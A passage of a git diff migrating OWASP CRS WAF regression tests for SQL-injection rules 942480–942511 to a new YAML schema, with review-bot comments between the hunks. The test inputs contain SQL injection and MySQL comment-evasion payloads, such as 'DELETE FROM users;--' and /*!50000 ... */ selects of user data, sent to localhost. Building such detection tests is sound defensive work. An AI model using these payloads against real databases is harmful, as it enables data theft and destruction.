text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) 
with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c42b..1f4a15f8c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
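Review bot: The new side of the 942480.yaml hunk ends up with two `test_id: 2` entries: the hunk adds a `- test_id: 2` block (carrying only `dest_addr`, `Host` and `Cache-Control`) immediately before the unchanged context lines `# variable name boundary attacks … log_contains: "id \"942480"`, and then adds another `- test_id: 2` (the Cookie test) where `test_title: 942480-2` used to be. As far as the visible lines show, the first of these has no `method`, `port`, `User-Agent` or `Accept` in its input, so it reads as a leftover fragment of an earlier edit rather than an intended test, and a duplicate id will either shadow or collide with the real test 2 depending on how the runner indexes tests. Separately, the new `test_id: 1` requests `uri: "/?'msdasql'"` while the old test 1 used `uri: "/get?'msdasql'"`; if this migration is meant to be behaviour-neutral, the URI should stay as `/get?'msdasql'` and the stray block should be removed, otherwise the extra test needs a unique id and a complete input section. Indentation is lost in this rendering, so the exact nesting of the stray block is inferred from key order.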
@@ -2,380 +2,356 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942490.yaml tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: 
id "942490" + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-9 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f874c..2e5c69a02 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml 
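Review bot: The meta block at the top of this hunk drops `enabled: true` and `name: 942490.yaml` without adding a replacement key, whereas the 942500 and 942520 hunks in the same commit add `+rule_id: 942500` / `+rule_id: 942520` next to the new `test_id` numbering. If the new test schema derives the rule under test from `rule_id` rather than from the file name, this file (and likewise the 942510 and 942511 hunks, which also drop both keys with no replacement) would have no way to map `test_id: 1` back to rule 942490; that is inferred from the other hunks, not stated on the page. Adding `rule_id: 942490` before `tests:` here, and the matching keys in the 942510 and 942511 files, would make the five files consistent. Separately, all 22 rewritten entries keep the identical `desc: "classic SQL injection probings 3/3"`, so a failing `test_id` cannot be told apart by its description; a short per-test note of what each payload probes would help whoever triages a regression.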
@@ -2,86 +2,80 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log_contains: id "942500" + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - 
uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log_contains: id "942500" + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211cc7..1b91b767f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml 
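Review bot: The rewritten stages in this hunk mix two scalar styles for the same field: tests 1, 2 and 5 emit `version: HTTP/1.0` unquoted while tests 3 and 4 emit `version: "HTTP/1.1"` quoted. Both parse as strings, so this is a style point only, but since the migration rewrites every stage line anyway it is the natural moment to settle on one form, e.g. `version: "HTTP/1.0"` throughout, matching the quoted `uri` and `User-Agent` values. The inconsistency is carried over verbatim from the removed lines, so nothing changes at runtime.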
@@ -2,38 +2,34 @@ meta: author: "Franziska Buehler, azurit" description: None - enabled: true - name: 942510.yaml tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log_contains: id "942510" + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + no_log_contains: id "942510" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3cb..f2c76b472 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml 
@@ -2,38 +2,34 @@ meta: author: "Walter Hop, azurit" description: None - enabled: true - name: 942511.yaml tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + no_log_contains: id "942511" + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 